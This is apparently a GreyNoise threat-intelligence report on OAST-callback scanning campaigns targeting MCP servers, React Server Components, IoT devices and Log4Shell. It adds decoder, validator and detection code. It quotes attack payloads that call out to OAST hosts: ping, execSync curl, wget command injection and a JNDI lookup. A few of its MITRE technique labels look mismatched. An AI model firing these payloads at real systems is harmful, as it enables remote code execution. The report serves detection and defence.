# Full Report
GreyNoise observed 30,165 sessions from 64 unique IP addresses containing Well-known Out-of-band Interaction Domains during the week of January 3-9, 2026. Analysis reveals three distinct operational clusters: a high-volume MCP server command injection campaign from a single OVH IP (51[.]77[.]116[.]46), a coordinated React2Shell (CVE-2025-55182) exploitation effort spanning four IPs across three ASNs, and opportunistic multi-vector scanning from MEVSPACE infrastructure. All activity utilized Interactsh domains across six provider TLDs, with 44 distinct OAST campaign identifiers decoded from 3,464 unique callback domains.

## Overview

This analysis covers OAST-tagged sessions observed across GreyNoise sensor infrastructure from January 3-9, 2026. The data was extracted from sessions tagged with "Contains Well-known Out-of-band Interaction Domain" and analyzed using JA4 fingerprinting, OAST domain decoding, and payload classification.

Session volume peaked on January 4 with 17,520 sessions (58% of weekly total), driven primarily by IP 51[.]77[.]116[.]46, which contributed 12,371 sessions on that single day. The temporal distribution shows sustained activity throughout the week with no significant gaps exceeding 24 hours, suggesting continuous automated scanning rather than manual operation.

JA4T fingerprint analysis identified two dominant TCP stack signatures:

- `64240_2-4-8-1-3_1460_7` (4,846 sessions, 17 IPs): standard Linux/WSL profile
- `65495_2-4-8-1-3_65495_7` (3,865 sessions, 24 IPs): non-standard MSS indicating tunneled or virtualized networking

The MSS 65495 fingerprint correlates with activity from known bulletproof hosting providers including MEVSPACE (AS201814) and appears across multiple campaigns, suggesting shared infrastructure or tooling.
## Campaign Analysis

### Campaign 1: MCP Server Command Injection (j332t)

| Attribute | Value |
|---|---|
| Sessions | 1,245 |
| Unique IPs | 1 |
| Source IP | 51[.]77[.]116[.]46 |
| ASN | AS16276 (OVH SAS) |
| OAST Provider | oast.site |
| First Seen | 2026-01-04 07:38:54 UTC |
| Last Seen | 2026-01-04 (single day burst) |

This campaign targets MCP (Model Context Protocol) server configurations with command injection payloads (GreyNoise Visualizer tag: Flowise Authentication Bypass CVE-2025-8943 RCE Attempt). The attack attempts to abuse the `mcpServerConfig` parameter to execute arbitrary commands via ping callbacks to OAST domains.

Sample Payload:

```json
{
  "inputs": {
    "mcpServerConfig": {
      "command": "ping",
      "args": ["d5d1gpj332t74modlrfg[REDACTED].oast.site", "-c", "1"]
    }
  }
}
```

The decoded OAST domain reveals:

- Timestamp: 2026-01-04 02:36:06 EST
- Machine ID: 63:18:ba
- Campaign identifier: j332t

This single-IP campaign generated high volume within a compressed timeframe, consistent with automated vulnerability scanning behavior.

### Campaign 2: React2Shell Exploitation (qsuzo)

| Attribute | Value |
|---|---|
| Sessions | 1,044 |
| Unique IPs | 4 |
| ASNs | AS13335 (Cloudflare), AS60223 (Netiface), AS3243 (MEO) |
| Countries | Portugal, Netherlands |
| OAST Provider | oast.fun |
| Date Range | 2026-01-04 to 2026-01-09 |

This campaign exploits CVE-2025-55182 (GreyNoise Visualizer tag: React Server Components Unsafe Deserialization CVE-2025-55182 RCE Attempt) using prototype pollution to achieve remote code execution via `child_process.execSync()`.

IP Distribution:

| IP | ASN | Sessions |
|---|---|---|
| 195[.]24[.]237[.]218 | AS60223 | 604 |
| 104[.]28[.]246[.]4 | AS13335 | 302 |
| 82[.]154[.]215[.]52 | AS3243 | 84 |
| 104[.]28[.]214[.]4 | AS13335 | 54 |

The presence of Cloudflare IPs (AS13335) suggests either proxied traffic or Cloudflare Workers-based attack infrastructure. The Netiface IP (195[.]24[.]237[.]218) contributed the majority of sessions.
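The decoded fields above (timestamp, machine ID, campaign identifier) come straight out of the Interactsh correlation ID, which is an rs/xid value: 20 base32hex characters packing a 4-byte Unix timestamp, a 3-byte machine ID, a 2-byte PID and a 3-byte counter, followed in a full Interactsh hostname by 13 random characters. The decoder below is an added example and not GreyNoise's own tooling; run against the redacted sample domain it reproduces the timestamp (07:36:06 UTC, i.e. 02:36:06 EST) and machine ID `63:18:ba` shown above. Treating characters 6-10 of the ID (`j332t`) as the campaign identifier is an assumption about how the report derives that field; that slice is the part of the ID that carries the machine-ID bytes, which is why it stays constant across one operator's scans.

```python
from datetime import datetime, timezone

# Interactsh correlation IDs are rs/xid values: 12 bytes (4 timestamp, 3 machine id,
# 2 pid, 3 counter) written as 20 base32hex characters. A full Interactsh label adds
# 13 random characters after the xid, so only the first 20 characters are decoded here.
_ALPHABET = "0123456789abcdefghijklmnopqrstuv"
_DEC = {c: i for i, c in enumerate(_ALPHABET)}


def xid_to_bytes(xid: str) -> bytes:
    """Unpack a 20-char base32hex xid into its 12 raw bytes (same bit layout as rs/xid)."""
    if len(xid) != 20 or any(c not in _DEC for c in xid):
        raise ValueError(f"not a 20-char base32hex xid: {xid!r}")
    d = [_DEC[c] for c in xid]
    packed = [
        d[0] << 3 | d[1] >> 2,
        d[1] << 6 | d[2] << 1 | d[3] >> 4,
        d[3] << 4 | d[4] >> 1,
        d[4] << 7 | d[5] << 2 | d[6] >> 3,
        d[6] << 5 | d[7],
        d[8] << 3 | d[9] >> 2,
        d[9] << 6 | d[10] << 1 | d[11] >> 4,
        d[11] << 4 | d[12] >> 1,
        d[12] << 7 | d[13] << 2 | d[14] >> 3,
        d[14] << 5 | d[15],
        d[16] << 3 | d[17] >> 2,
        d[17] << 6 | d[18] << 1 | d[19] >> 4,
    ]
    return bytes(b & 0xFF for b in packed)


def decode_oast_domain(domain: str) -> dict:
    """Split an Interactsh callback hostname into the fields the report tabulates."""
    host = domain.strip().lower().rstrip(".")
    labels = host.split(".")
    xid = labels[0][:20]  # survives the "[REDACTED]" nonce suffix in the report's sample
    raw = xid_to_bytes(xid)
    ts = int.from_bytes(raw[0:4], "big")
    return {
        "correlation_id": xid,
        "unix_time": ts,
        "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
        "machine_id": ":".join(f"{b:02x}" for b in raw[4:7]),
        "pid": int.from_bytes(raw[7:9], "big"),
        "counter": int.from_bytes(raw[9:12], "big"),
        # Assumption: the report's five-character campaign identifier is the slice of the
        # xid that carries the machine-id bytes (characters 6-10), e.g. "j332t".
        "campaign_id": xid[6:11],
        "provider": ".".join(labels[-2:]),
    }


if __name__ == "__main__":
    # Sample domain quoted in the report (its trailing nonce is redacted there).
    for key, value in decode_oast_domain("d5d1gpj332t74modlrfg[REDACTED].oast.site").items():
        print(f"{key:>15}: {value}")
```

Because the machine ID and PID stay fixed for the lifetime of one Interactsh client, grouping callback domains by those bytes is what lets otherwise unrelated sessions be tied back to the same scanner instance, even when the source IPs differ.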
Payload Pattern:

```text
{\"then\": \"$1:__proto__:then\", \"status\": \"resolved_model\", \"reason\": -1, \"value\": \"{\\\"then\\\":\\\"$B1337\\\"}\", \"_response\": {\"_prefix\": \"var res=process.mainModule.require('child_process').execSync('curl https://[OAST]')\"}}
```

### Campaign 3: Multi-Vector MEVSPACE Scanning

| Attribute | Value |
|---|---|
| Sessions | 4,160 |
| Source IP | 94[.]26[.]88[.]61 |
| ASN | AS201814 (MEVSPACE) |
| Country | Poland |
| Attack Types | XStream, .NET Deserialization, Log4Shell |
| OAST Providers | Multiple (oast.site, oast.online, oast.pro) |

MEVSPACE sp. z o.o. is a known bulletproof hosting provider. This IP executed multiple exploit types across the analysis window.

Attack Type Distribution from 94[.]26[.]88[.]61:

| Attack Type | Sessions |
|---|---|
| XStream Deserialization | 144 |
| .NET JSON Deserialization | 93 |
| Log4Shell (CVE-2021-44228) | 287 |
| Other callback attempts | 3,636 |

The diversity of attack payloads from a single source suggests an automated vulnerability scanner cycling through multiple exploit modules.

## Additional Activity

### Google Cloud Infrastructure (AS396982)

Fifteen unique IPs from Google Cloud (AS396982) contributed scanning activity, primarily from Netherlands-based instances. The consistent JA4T fingerprint `65320_2-4-8-1-3_1420_7` across these IPs suggests a shared deployment or tooling:

| IP | Sessions |
|---|---|
| 34[.]32[.]217[.]222 | 245 |
| 34[.]91[.]156[.]181 | 124 |
| 34[.]91[.]29[.]122 | 118 |
| 34[.]91[.]237[.]187 | 115 |
| (11 others) | |

### IoT Command Injection

Seventeen sessions from seven unique IPs targeted IoT device command injection endpoints (e.g., `/syscmd.htm`). Sample payload:

```text
submit-url=%2Fsyscmd.htm&sysCmdselect=5&save_apply=Run+Command&sysCmd=wget+http://[OAST].oast.pro
```

This activity was distributed across residential and hosting ASNs with no clear clustering.
## Infrastructure Analysis

### JA4 Fingerprint Clusters

| JA4T | JA4H | Sessions | IPs | Infrastructure Type |
|---|---|---|---|---|
| 64240_2-4-8-1-3_1460_7 | ge11nn06en00_0e5d97bc8ad6 | 1,088 | 5 | Standard Linux |
| 65495_2-4-8-1-3_65495_7 | ge11nn06en00_0e5d97bc8ad6 | 886 | 7 | Tunneled/Virtual |
| 64240_2-4-8-1-3_1460_7 | po11nn060000_4ea4093e6290 | 622 | 8 | Standard Linux |
| 65495_2-4-8-1-3_65495_7 | po11nn060000_4ea4093e6290 | 550 | 12 | Tunneled/Virtual |

The same JA4H fingerprints appearing with both standard and non-standard JA4T values indicate that the same HTTP tooling was deployed across different network environments.

### OAST Provider Distribution

| Provider | Unique Domains |
|---|---|
| oast.site | 1,618 |
| oast.online | 658 |
| oast.me | 473 |
| oast.fun | 261 |
| oast.pro | 257 |
| oast.live | 195 |
| dnslog.cn | 2 |

All providers are Interactsh infrastructure except for the 2 dnslog.cn domains. The use of multiple Interactsh TLDs within single campaigns suggests operational security measures to avoid domain-based blocking.

## Attribution Assessment

Confidence: Medium

The three primary campaigns show distinct operational characteristics:

- **j332t (MCP Server):** Single IP, single day, novel attack vector targeting AI/LLM infrastructure. The specificity of the payload suggests an operator with knowledge of MCP protocol implementations. OVH hosting provides limited attribution value.
- **qsuzo (React2Shell):** Multi-IP coordination across three ASNs suggests either a distributed scanning framework or an initial access broker operation. The use of Cloudflare edge IPs complicates origin attribution.
- **MEVSPACE activity:** Bulletproof hosting origin is consistent with professional scanning operations. The multi-vector approach suggests automated vulnerability assessment tooling rather than targeted exploitation.

The decoded OAST campaign identifiers (44 unique) do not show clear correlation between otherwise distinct fingerprint clusters, suggesting these campaigns are operationally independent.
## Network IOCs

### Primary IPs (>200 sessions)

| IP | ASN | Org | Sessions |
|---|---|---|---|
| 51[.]77[.]116[.]46 | AS16276 | OVH SAS | 16,814 |
| 94[.]26[.]88[.]61 | AS201814 | MEVSPACE | 4,160 |
| 195[.]24[.]237[.]218 | AS60223 | Netiface | 1,952 |
| 104[.]28[.]246[.]4 | AS13335 | Cloudflare | 944 |
| 209[.]38[.]59[.]248 | AS14061 | DigitalOcean | 763 |
| 139[.]59[.]217[.]230 | AS14061 | DigitalOcean | 717 |
| 198[.]98[.]61[.]39 | AS53667 | FranTech | 335 |
| 188[.]212[.]125[.]110 | AS202448 | MVPS LTD | 328 |
| 80[.]191[.]90[.]190 | AS58224 | Iran Telecom | 323 |
| 185[.]181[.]183[.]41 | AS206596 | Iran (CRCIS) | 308 |

### JA4 Fingerprints for Detection

```text
# JA4T - Non-standard MSS (bulletproof/tunneled)
65495_2-4-8-1-3_65495_7

# JA4T - Standard Linux
64240_2-4-8-1-3_1460_7

# JA4H - Common HTTP signature across campaigns
ge11nn06en00_0e5d97bc8ad6_000000000000_000000000000
po11nn060000_4ea4093e6290_000000000000_000000000000
```

## Detection Recommendations

1. **Block or alert on MSS 65495 TCP connections.** This non-standard value is highly anomalous and correlates with bulletproof hosting infrastructure.
2. **Monitor for MCP server configuration manipulation.** Payloads containing `mcpServerConfig` with command execution should trigger investigation.
3. **Detect React2Shell patterns.** Look for `__proto__` combined with `child_process` in request bodies.
4. **Prioritize patching for:**
   - CVE-2025-55182 (React2Shell)
   - CVE-2021-44228 (Log4Shell)
   - XStream deserialization vulnerabilities
5. **Consider blocking Interactsh callback domains at the network perimeter.** The oast.* TLDs are rarely used legitimately outside of authorized security testing.

## GNQL Queries

```text
# All OAST activity in the past 7 days
tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d

# MEVSPACE infrastructure
metadata.asn:AS201814 last_seen:7d

# React2Shell exploitation attempts
cve:CVE-2025-55182 last_seen:7d
```
# Analysis Summary
# Tool/Technique: MCP Server Command Injection (Campaign j332t)
## Overview
This refers to a concentrated command injection attack targeting Model Context Protocol (MCP) server configurations, specifically linked to an alleged authentication bypass vulnerability (CVE-2025-8943). The primary goal is Remote Code Execution (RCE) demonstrated via outbound ping callbacks to an Out-of-Band Application Security Testing (OAST) domain.
## Technical Details
- Type: Technique / Exploitation (Vulnerability Scanning Activity)
- Platform: MCP Server (Likely running Flowise or similar LLM infrastructure)
- Capabilities: Executes system commands embedded within specific JSON payload fields (`mcpServerConfig`).
- First Seen: 2026-01-04 07:38:54 UTC
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- TA0002 - Execution
- T1202 - Command and Scripting Interpreter
## Functionality
### Core Capabilities
- Abuse of the `mcpServerConfig` parameter.
- Execution of arbitrary system commands (e.g., `ping`) to generate an OAST callback.
- Exploitation attributed to **CVE-2025-8943** (Flowise Authentication Bypass RCE Attempt).
### Advanced Features
- High-volume, single-source burst activity (12,371 sessions in one day).
- Use of specific OAST provider (`oast.site`).
- Campaign identifier `j332t` decoded from the callback domain.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Source IP `51[.]77[.]116[.]46`. Callback domains pointing to `*.oast.site`.
- Behavioral Indicators: HTTP POST requests containing the structure `{"inputs": {"mcpServerConfig": {"command": "ping", ...}}}`.
## Associated Threat Actors
Unknown. The activity is attributed to automated scanning by an operator who leveraged OVH infrastructure.
## Detection Methods
- Monitor for HTTP requests containing the parameter `mcpServerConfig` with command execution attempts.
- Monitor for outbound connections originating from web servers to OAST domains, specifically those tagged with `j332t`.
- Alert on TCP connections originating from `51[.]77[.]116[.]46`.
## Mitigation Strategies
- Immediately patch or secure applications handling MCP server configurations against command injection.
- Implement strict input validation and sanitization for all configuration parameters.
- Block outbound callbacks to known OAST infrastructure.
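The two mitigations above (validate configuration parameters strictly, never let a configuration field reach a shell) can be made concrete on the `mcpServerConfig` object itself. The validator below is an added example written for this report, not Flowise code or any MCP SDK API; the launcher allow-list, the denied environment variables and the argument character class are assumptions about what a host needs for stdio MCP servers and would be tuned per deployment. It rejects the report's `ping` payload on the allow-list alone, and defends in depth by refusing shell metacharacters in arguments and loader-controlling environment variables, while the accepted configuration is handed to the caller as an argv list that must be spawned with `shell=False`.

```python
import re

# Assumption (not from the report): the host only ever launches these stdio MCP server
# launchers, so "command" is matched against this allow-list by exact name. Anything
# else, including "ping", is refused before any argument is looked at.
ALLOWED_COMMANDS = {"npx", "node", "python3", "uvx"}
# Environment variables that change what a launcher executes or loads.
DENIED_ENV = {"PATH", "LD_PRELOAD", "LD_LIBRARY_PATH", "NODE_OPTIONS", "PYTHONPATH"}
# Shell metacharacters, quotes and control characters never belong in one argv element;
# they only matter if a launcher re-parses its arguments, but that is exactly the case
# an allow-listed launcher such as npx can hit via package scripts.
UNSAFE_ARG_RE = re.compile(r"[;&|`$<>\"'\\\x00-\x1f]")
ENV_KEY_RE = re.compile(r"^[A-Z_][A-Z0-9_]*$")


def validate_mcp_server_config(cfg, allowed=ALLOWED_COMMANDS):
    """Return (ok, reason). Only a plain, allow-listed launcher with clean args passes."""
    if not isinstance(cfg, dict):
        return False, "mcpServerConfig must be a JSON object"
    command = cfg.get("command")
    args = cfg.get("args", [])
    env = cfg.get("env", {})
    if not isinstance(command, str) or command not in allowed:
        return False, f"command not allow-listed: {command!r}"
    if not isinstance(args, list) or not all(isinstance(a, str) for a in args):
        return False, "args must be a list of strings"
    for a in args:
        if UNSAFE_ARG_RE.search(a):
            return False, f"unsafe characters in argument: {a!r}"
    if not isinstance(env, dict):
        return False, "env must be a JSON object"
    for k, v in env.items():
        if not ENV_KEY_RE.match(str(k)) or k in DENIED_ENV or not isinstance(v, str) or "\n" in v:
            return False, f"disallowed environment entry: {k!r}"
    return True, "ok"


def build_argv(cfg):
    """Validated argv for subprocess.Popen(argv, shell=False); raises ValueError on rejection."""
    ok, reason = validate_mcp_server_config(cfg)
    if not ok:
        raise ValueError(reason)
    return [cfg["command"], *cfg.get("args", [])]


if __name__ == "__main__":
    # The report's payload (callback label constructed) against a constructed benign config.
    samples = [
        {"command": "ping", "args": ["d5d1gpj332t74modlrfgc0nstructed01.oast.site", "-c", "1"]},
        {"command": "npx", "args": ["-y", "@modelcontextprotocol/server-filesystem", "/srv/data"]},
    ]
    for s in samples:
        print(s["command"], "->", validate_mcp_server_config(s))
```

The check is deliberately an allow-list rather than a deny-list of dangerous commands: the report's scanner used `ping` only because it is the cheapest way to trigger an OAST callback, and a deny-list would have to anticipate every other binary that can reach the network. Validation is also no substitute for the authentication that CVE-2025-8943 is reported to bypass; it limits what an already-authenticated (or wrongly unauthenticated) caller can do.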
## Related Tools/Techniques
- General Command Injection techniques.
---
# Tool/Technique: React2Shell Exploitation (Campaign qsuzo)
## Overview
This campaign exploits a deserialization vulnerability in React Server Components, tracked as **CVE-2025-55182**, which leads to Remote Code Execution (RCE) via prototype pollution and subsequent execution of shell commands (`child_process.execSync`).
## Technical Details
- Type: Technique / Exploitation (Vulnerability Scanning Activity)
- Platform: JavaScript/Node.js environments running vulnerable React applications.
- Capabilities: Achieves RCE through prototype pollution to manipulate object structure and force execution of Node.js modules like `child_process`.
- First Seen: 2026-01-04
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- TA0002 - Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell
## Functionality
### Core Capabilities
- Exploitation of **CVE-2025-55182** (React Server Components Unsafe Deserialization).
- Uses prototype pollution (`__proto__:then`) payload structure.
- Executes system commands via `process.mainModule.require('child_process').execSync('curl https://[OAST]')`.
### Advanced Features
- Coordinated activity across 4 unique IPs spanning 3 different Autonomous System Numbers (ASNs: AS60223, AS13335, AS3243).
- Traffic potentially proxied through Cloudflare (AS13335).
- Campaign identifier `qsuzo` discovered in callbacks.
- Frequent use of OAST provider `oast.fun`.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Source IPs including `195[.]24[.]237[.]218`, `104[.]28[.]246[.]4`. Callback domains pointing to `*.oast.fun`.
- Behavioral Indicators: HTTP requests containing JSON structures including `"then": "$1:__proto__:then"` and references to `'child_process'`.
## Associated Threat Actors
Unknown. The distributed nature involving Cloudflare suggests use of common, potentially cloud-based, attack tooling.
## Detection Methods
- Signature matching for the specific component payload pattern including `__proto__` and `child_process`.
- Network monitoring for connection success callbacks from `*.oast.fun`.
- Alerting on activity associated with **CVE-2025-55182**.
## Mitigation Strategies
- Patch immediately for **CVE-2025-55182**.
- Review serialization/deserialization logic thoroughly to prevent prototype pollution attacks.
- Limit the capabilities available to child process execution contexts wherever possible.
## Related Tools/Techniques
- Prototype Pollution exploits targeting Node.js applications.
---
# Tool/Technique: Multi-Vector Vulnerability Scanner (Campaign MEVSPACE/Opportunistic)
## Overview
This activity, predominantly originating from infrastructure belonging to the bulletproof hosting provider MEVSPACE (AS201814), was a high-volume, multi-vector automated scanning operation attempting to exploit known critical vulnerabilities.
## Technical Details
- Type: Tool / Framework (Vulnerability Scanner)
- Platform: Unknown, targeting multiple software components across victims.
- Capabilities: Simultaneously tests for XStream Deserialization flaws, .NET Deserialization flaws, and Log4Shell (**CVE-2021-44228**), along with other general callback attempts.
- First Seen: Activity spanned the entire observation week (Jan 3-9, 2026).
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- TA0008 - Lateral Movement
- T1090 - Proxy (Implied by use of bulletproof hosting)
## Functionality
### Core Capabilities
- **Log4Shell Exploitation:** Presence of callbacks associated with **CVE-2021-44228**.
- **Deserialization Testing:** Attempts against XStream and .NET JSON deserialization endpoints.
- **Broad Scanning:** High volume of "Other callback attempts" (3,636 sessions), indicating a generic probe for *any* OAST interaction.
### Advanced Features
- Use of infrastructure located in known bulletproof hosting environments (MEVSPACE).
- Correlation with the non-standard Linux/Virtualized TCP fingerprint (`65495_2-4-8-1-3_65495_7`), suggesting usage of specialized, potentially highly obfuscated, scanning agents.
- Utilized multiple Interactsh callback TLDs (`oast.site`, `oast.online`, `oast.pro`) simultaneously.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: Source IP `94[.]26[.]88[.]61`.
- Behavioral Indicators: High volume of diverse, weaponized payloads originating from AS201814.
## Associated Threat Actors
Likely professional scanner operators or penetration testing tool developers utilizing bulletproof hosting for anonymity.
## Detection Methods
- Prioritize blocking/alerting traffic from ASN AS201814 (MEVSPACE).
- Detection rules specifically targeting payloads for Log4Shell, XStream, and .NET Deserialization combined with OAST callbacks.
- Alert on the `65495_2-4-8-1-3_65495_7` JA4T fingerprint associated with continuous scanning.
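The Detection Recommendations in the full report and the Detection Methods lists of the three campaign summaries above all reduce to a handful of request-body indicators: an `mcpServerConfig` object carrying a `command`, `__proto__` together with `child_process`, a `${jndi:` lookup for Log4Shell, a `sysCmd=wget` or `sysCmd=curl` field for the `/syscmd.htm` IoT endpoint, and any hostname under the six Interactsh TLDs or dnslog.cn. The classifier below is an added example, not a GreyNoise tag implementation; the tag names, the sample request paths and the 33-character callback labels are constructed for the demonstration, and the request bodies are modelled on the payloads quoted in the report.

```python
import json
import re
from urllib.parse import unquote_plus

# Callback-domain pattern built from the providers the report lists:
# six Interactsh TLDs plus dnslog.cn.
OAST_DOMAIN_RE = re.compile(
    r"\b[a-z0-9]+\.oast\.(?:site|online|me|fun|pro|live)\b"
    r"|\b[a-z0-9][a-z0-9.-]*\.dnslog\.cn\b",
    re.IGNORECASE,
)
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)   # Log4Shell lookup trigger
IOT_CMD_RE = re.compile(r"sysCmd=(?:wget|curl)\b")  # /syscmd.htm command field


def _has_mcp_command(node) -> bool:
    """True if any nested object is an mcpServerConfig carrying a 'command' key."""
    if isinstance(node, dict):
        cfg = node.get("mcpServerConfig")
        if isinstance(cfg, dict) and "command" in cfg:
            return True
        return any(_has_mcp_command(v) for v in node.values())
    if isinstance(node, list):
        return any(_has_mcp_command(v) for v in node)
    return False


def classify_request(path: str, body: str) -> dict:
    """Tag one HTTP request with the report's indicators; returns tags and OAST domains seen."""
    decoded = unquote_plus(body)  # form-encoded bodies hide '+' and %2F
    tags = set()
    oast = sorted({m.group(0).lower() for m in OAST_DOMAIN_RE.finditer(decoded)})
    if oast:
        tags.add("oast_callback")
    try:
        parsed = json.loads(body)
    except ValueError:
        parsed = None
    if parsed is not None and _has_mcp_command(parsed):
        tags.add("mcp_command_injection")
    if "__proto__" in decoded and "child_process" in decoded:
        tags.add("react2shell")
    if JNDI_RE.search(decoded):
        tags.add("log4shell")
    if (path.endswith("/syscmd.htm") or "syscmd.htm" in decoded) and IOT_CMD_RE.search(decoded):
        tags.add("iot_command_injection")
    return {"path": path, "tags": sorted(tags), "oast_domains": oast}


def scan(requests):
    """Classify (path, body) pairs and keep only the requests that raised a tag."""
    return [r for r in (classify_request(p, b) for p, b in requests) if r["tags"]]


# Constructed sample traffic modelled on the payloads quoted in the report; the paths
# and the callback labels are made up (a real Interactsh label is 33 characters).
SAMPLE_REQUESTS = [
    ("/api/v1/prediction/constructed-id", json.dumps({"inputs": {"mcpServerConfig": {
        "command": "ping", "args": ["d5d1gpj332t74modlrfgc0nstructed01.oast.site", "-c", "1"]}}})),
    ("/", '{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, '
          '"value": "{\\"then\\":\\"$B1337\\"}", "_response": {"_prefix": '
          '"var res=process.mainModule.require(\'child_process\')'
          '.execSync(\'curl https://d5d1gpj332t74modlrfgc0nstructed02.oast.fun\')"}}'),
    ("/login", "user=${jndi:ldap://d5d1gpj332t74modlrfgc0nstructed03.oast.online/a}&pass=x"),
    ("/syscmd.htm", "submit-url=%2Fsyscmd.htm&sysCmdselect=5&save_apply=Run+Command"
                    "&sysCmd=wget+http://d5d1gpj332t74modlrfgc0nstructed04.oast.pro"),
    ("/api/v1/prediction/constructed-id", '{"inputs": {"question": "What is MCP?"}}'),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit["path"], hit["tags"], hit["oast_domains"])
```

Matching on the decoded body matters for the IoT case: the `+` and `%2F` in the form-encoded payload otherwise keep `wget` from lining up with the `sysCmd=` field. The extracted `oast_domains` list is the pivot point for the rest of the report's workflow, since those hostnames are what the correlation-ID decoding and the per-campaign grouping consume.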
## Mitigation Strategies
- Apply critical patches for **CVE-2021-44228 (Log4Shell)**.
- Implement robust Web Application Firewalls (WAFs) to filter known deserialization patterns.
- Apply network ACLs to restrict access to vulnerable endpoints.
## Related Tools/Techniques
- Automated vulnerability scanning tools that leverage OAST frameworks like Interactsh for verification.
---
# General Observable: Out-of-Band Application Security Testing (OAST) Infrastructure
## Overview
The activity observed utilized OAST techniques, primarily harnessing Interactsh infrastructure (via domains like `oast.site`, `oast.fun`, etc.) to confirm the success of exploitation attempts by forcing a callback from the target server.
## Technical Details
- Type: Technique / Tooling Component
- Platform: Infrastructure used by attackers/testers (Interactsh)
- Capabilities: Provides ephemeral, verifiable inbound network communication points (DNS, HTTP, etc.) to confirm vulnerability impact, bypassing traditional firewall restrictions.
- First Seen: Continuous throughout the observed window.
## MITRE ATT&CK Mapping
- T1560.003 - Archive Collected Data: Steganography (Used conceptually for encoding/exfiltration confirmation)
- T1071.004 - Application Layer Protocol: DNS (Common callback mechanism)
## Functionality
### Core Capabilities
- Confirmation of Command Execution via callback requests.
- Use of 44 distinct OAST campaign identifiers to track disparate scanning efforts.
- Rotation across six different TLDs for Interactsh domains to evade static blocking lists.
### Advanced Features
- Correlation analysis based on unique campaign identifiers.
- Specific use of the `oast.fun` domain linked exclusively to the React2Shell campaign.
## Indicators of Compromise
- Network Indicators: Any connection to domains ending in `.oast.site`, `.oast.fun`, `.oast.me`, `.oast.pro`, `.oast.live`, or `dnslog.cn`.
## Detection Methods
- **High Priority Recommendation:** Block outbound connections to all Interactsh provider TLDs at the network perimeter unless explicitly whitelisted for authorized testing.
- Monitor internal systems for DNS lookups or HTTP requests to these domains.
## Mitigation Strategies
- Enforce egress filtering to only allow necessary external connectivity.
- Utilize network monitoring tools to track non-standard outbound reconnaissance traffic.
## Related Tools/Techniques
- Interactsh, Canarytokens, Burp Collaborator.